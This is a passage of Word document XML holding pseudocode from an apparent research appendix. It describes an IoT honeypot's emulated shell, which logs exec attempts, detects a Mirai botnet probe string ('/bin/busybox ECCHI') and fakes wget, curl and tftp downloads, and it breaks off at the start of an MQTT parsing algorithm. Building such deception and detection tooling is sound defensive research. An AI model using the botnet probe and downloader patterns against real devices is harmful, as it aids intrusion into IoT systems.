                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">continue</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> op = "||" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> last_ok </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">continue</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9:          (text, ok, exit) ← pipeline(segment)            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// stages split on single |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10:         last_ok ← ok;  append text </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> out</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> exit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">break</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13:     session.command(line, output = join(out))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">14:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> join(out), exit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> simple(cmdline, stdin):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">16:     strip redirections (&gt; file, &gt;&gt; file, 2&gt;&amp;1) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> remember target</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">17:     cmd, args ← shlex split; expand $VARS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">18:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> cmd is a path (./x, /tmp/x) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> exec(path)  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// exec_attempt event</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> handler c_&lt;cmd&gt; exists </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> text ← handler(args, stdin)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">20:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">else if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> cmd is a Mirai probe (/bin/busybox ECCHI) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> text ← "ECCHI: applet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> found"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">21:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">else</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> text ← "-sh: &lt;cmd&gt;: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> found"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> redirect target </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> write text into the fake file system</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">23:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> text</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">24: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// wget/curl/tftp create a fake file and print progress; lockctl/sensorctl change Redis state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9021" w:name="_Toc69021"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A4 – MQTT Packet Parsing and Device Control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9021"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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5142"/>
        <w:gridCol w:w="4208"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="28829D87" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A4 read_packet (MQTT 3.1.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A4.1 apply_control (control topics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="1986AEDF" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> raw TCP socket of an MQTT client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
